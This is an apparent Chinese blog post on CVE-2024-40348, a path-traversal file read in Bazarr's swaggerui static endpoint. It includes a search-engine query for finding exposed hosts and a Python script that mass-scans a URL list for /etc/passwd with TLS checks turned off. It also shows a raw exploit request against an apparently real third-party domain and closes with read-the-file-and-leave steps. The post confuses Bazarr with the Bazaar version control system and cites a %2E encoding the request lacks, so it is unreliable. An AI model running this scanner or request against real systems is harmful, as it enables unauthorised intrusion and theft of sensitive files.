当前位置:   article > 正文

【漏洞复现】Bazaar CVE-2024-40348 任意文件读取漏洞

cve-2024-40348

         声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

Bazaar是一个功能强大的版本控制系统,它能够帮助用户详细记录项目的历史变化,并简化与他人的协作流程。无论是单打独斗的开发者、紧密合作的团队,还是遍布全球的开源社区成员,Bazaar都能灵活适应各种需求。然而,它的static接口存在一个严重的安全漏洞,攻击者可以利用这个漏洞读取系统的敏感文件信息。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:title="Bazarr"

2.使用poc批量扫描

  1. import urllib.request
  2. import urllib3
  3. from urllib.parse import urljoin,quote
  4. import argparse
  5. import ssl
  6. import re
  7. # 禁用SSL证书验证,允许不安全的请求
  8. ssl._create_default_https_context = ssl._create_unverified_context
  9. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  10. def read_file(file_path):
  11. # 读取文件中的URL列表
  12. with open(file_path, 'r') as file:
  13. urls = file.read().splitlines()
  14. return urls
  15. def check(url):
  16. # 移除URL末尾的斜杠
  17. url = url.rstrip("/")
  18. # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd
  19. target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
  20. headers = {
  21. "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
  22. }
  23. try:
  24. # 发送GET请求
  25. response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
  26. res = urllib.request.urlopen(response)
  27. status_code = res.getcode()
  28. content = res.read().decode()
  29. # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件
  30. if status_code == 200 and 'root:' in content and 'var' in content:
  31. print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m")
  32. return True
  33. except Exception as e:
  34. print(e)
  35. if __name__ == "__main__":
  36. parser = argparse.ArgumentParser()
  37. parser.add_argument("-u", "--url", help="URL")
  38. parser.add_argument("-f", "--txt", help="file")
  39. args = parser.parse_args()
  40. url = args.url
  41. txt = args.txt
  42. if url:
  43. # 如果提供了单个URL,直接检查
  44. check(url)
  45. elif txt:
  46. # 如果提供了包含多个URL的文件,逐个检查
  47. urls = read_file(txt)
  48. for url in urls:
  49. check(url)
  50. else:
  51. # 如果没有提供任何参数,显示帮助信息
  52. print("help")

cmd运行:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

  1. GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/2
  2. Host: subs.kalvisbuls.xyz
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept: */*
  6. Connection: close

2.数据包分析 

这是一个HTTP GET请求的数据包,用于从服务器获取资源。下面是对这个数据包的详细解释:

1. `GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/2`: 这是请求行,表示客户端想要从服务器获取的资源。这里的URL是`/api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd`,其中`%2F`是URL编码中的斜杠(/),`%2E`是点(.)。这个URL试图访问服务器上的`/etc/passwd`文件,这是一个包含用户信息的敏感文件。

2. `Host: subs.kalvisbuls.xyz`: 这是请求头的一部分,指定了请求的目标服务器。在这个例子中,目标服务器的域名是`subs.kalvisbuls.xyz`。

3. `User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`: 这是请求头的一部分,描述了发起请求的客户端的类型和版本。在这个例子中,客户端是一个运行在Windows NT 6.1系统上的浏览器,具体是Chrome 41.0.2228.0版本。

4. `Accept-Encoding: gzip, deflate`: 这是请求头的一部分,告诉服务器客户端可以接受的响应内容的压缩格式。在这个例子中,客户端可以接受gzip或deflate压缩的内容。

5. `Accept: */*`: 这是请求头的一部分,表示客户端可以接受任何类型的响应内容。

6. `Connection: close`: 这是请求头的一部分,表示客户端希望在响应完成后关闭连接。这意味着服务器在发送完响应后不会保持与客户端的连接。

3.结束跑路

1.构造数据包,发送读取服务器/etc/passwd

2.直接使用游览器访问,http://ip/api/swaggerui/static/../../../../../../../../../../etc/passwd

3.打开下载下来的文件查看 

每篇一言:爱若执炬迎风,炽烈而哀恸,诸般滋味皆在其中。

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号